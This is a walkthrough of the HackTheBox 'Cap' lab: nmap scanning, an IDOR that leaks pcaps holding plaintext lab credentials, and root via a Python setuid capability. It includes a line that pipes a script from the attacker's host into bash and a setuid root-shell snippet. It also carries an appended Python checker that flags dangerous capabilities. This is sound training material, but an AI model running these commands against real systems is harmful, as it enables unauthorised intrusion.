HackTheBox machine "Cap"
Dharmendra Kumar
Cybersecurity Enthusiast | CTF Player | Security Researcher |Jr Penetration tester| VAPT | Data Structures & Algorithms | C & Python Programming
Description
The machine "Cap" is a Linux-based system classified as easy difficulty. It hosts an HTTP server designed for administrative tasks, one of which includes network capture functionality. However, weak security controls lead to an Insecure Direct Object Reference (IDOR) vulnerability. This vulnerability allows an unauthorized user to access network captures belonging to other users. Upon analyzing the capture file, plaintext credentials are discovered, enabling the attacker to gain an initial foothold on the system. To escalate privileges and gain root access, a specific Linux capability is exploited, which further highlights the misconfigurations present in the system.
Skills Required
- Web enumeration
- Packet capture analysis
Skills Learned
- IDOR
- Exploiting Linux capabilities
Analysis
Step 1: The nmap scan against the IP address 10.129.17.215 uses the following options:
-Pn: Skip host discovery and go straight to port scanning, treating the host as live.
-sC: Run nmap's default script set, which performs standard checks against the discovered services.
-sV: Perform service version detection, revealing which services and versions are running on which ports.
Step 2: FTP (File Transfer Protocol)
Let's check whether FTP allows anonymous access.
Step 3: HTTP (Hypertext Transfer Protocol)
Nmap shows that port 80 is running Gunicorn, a Python-based HTTP server. When we visit the page, it loads a dashboard.
Browsing to the IP Config page reveals the output of ifconfig.
Similarly, the Network Status page reveals the output of netstat. This suggests that the application is executing system commands. Clicking on the Security Snapshot menu item pauses the page for a few seconds and returns a page as shown below.
Step 4: There was some data in /data/0, so let's download the pcap and analyze it using Wireshark.
Step 5: The traffic is not encrypted, allowing us to retrieve the user credentials, i.e. nathan / Buck3tH4TF0RM3!. These are found to be valid not only for FTP but can also be used to log in via SSH.
Step 6: Privilege Escalation
From our shell on Cap, we can fetch linpeas.sh with curl and pipe the output directly into bash to execute it:
curl https://10.10.14.24/linpeas.sh | bash
The following Python commands will result in a root shell:
- import os
- os.setuid(0)
- os.system("/bin/bash")
The os.setuid() call modifies the process user identifier (UID); setting it to 0 makes the process run as root, so the shell spawned by os.system() is a root shell.
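As an added defensive check, not part of the original writeup: the escalation above only works because the interpreter carries a file capability, so auditing the output of `getcap -r / 2>/dev/null` for identity-changing capabilities catches the misconfiguration. The sample output below is constructed, and the binary paths in it are assumptions rather than values taken from the box.

```python
import re

# Capabilities that let a process change identity or bypass file permissions.
# A world-executable binary carrying one of these is an escalation path for any
# local user who can run it; for a script interpreter, for any code they feed it.
DANGEROUS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_chown", "cap_fowner", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module",
}

# Constructed sample of `getcap -r /` output. It mixes the older libcap style
# ("path = caps+flags") with the newer one ("path caps=flags") so the parser
# handles both; the paths are assumptions, not findings from a real host.
SAMPLE_GETCAP = """\
/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

# One clause: comma-separated capability names, then '+' or '=', then e/i/p flags.
CLAUSE_RE = re.compile(r"^([a-z0-9_,]+)[+=]([eip]*)$")


def parse_getcap(text):
    """Return {path: {cap_name: set(flags)}} for each non-empty line of getcap output."""
    result = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        path, _, rest = line.partition(" ")
        if rest.startswith("="):          # older "path = caps" style
            rest = rest[1:]
        caps = {}
        for clause in rest.split():
            match = CLAUSE_RE.match(clause)
            if not match:
                raise ValueError(f"unrecognised capability clause: {clause!r}")
            names, flags = match.groups()
            for name in names.split(","):
                caps.setdefault(name, set()).update(flags)
        result[path] = caps
    return result


def dangerous_capabilities(text):
    """Return {path: sorted dangerous caps} for binaries whose permitted set is risky.

    A cap in the permitted ('p') set is enough to worry about: with 'e' it is
    raised automatically at exec, and without it the program can raise it itself.
    """
    findings = {}
    for path, caps in parse_getcap(text).items():
        risky = sorted(n for n, flags in caps.items() if n in DANGEROUS and "p" in flags)
        if risky:
            findings[path] = risky
    return findings


if __name__ == "__main__":
    for path, caps in dangerous_capabilities(SAMPLE_GETCAP).items():
        print(f"{path}: {', '.join(caps)}")
```

On a real host, feed it the actual `getcap -r / 2>/dev/null` output instead of the sample; the remediation for a flagged interpreter is `setcap -r <path>` and, if the capability was genuinely needed, moving that function to a dedicated, non-scriptable binary.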
Thank you for visiting
Cybersecurity | SOC Analyst | Penetration Test | Ethical Hacking | Python Dev | Web3 | Blockchain | Financial Analyst | Linux System
6 months
Great work
C || Java || Python || DSA || HTML || CSS || Networking || Cybersecurity enthusiasm
6 months
Very helpful!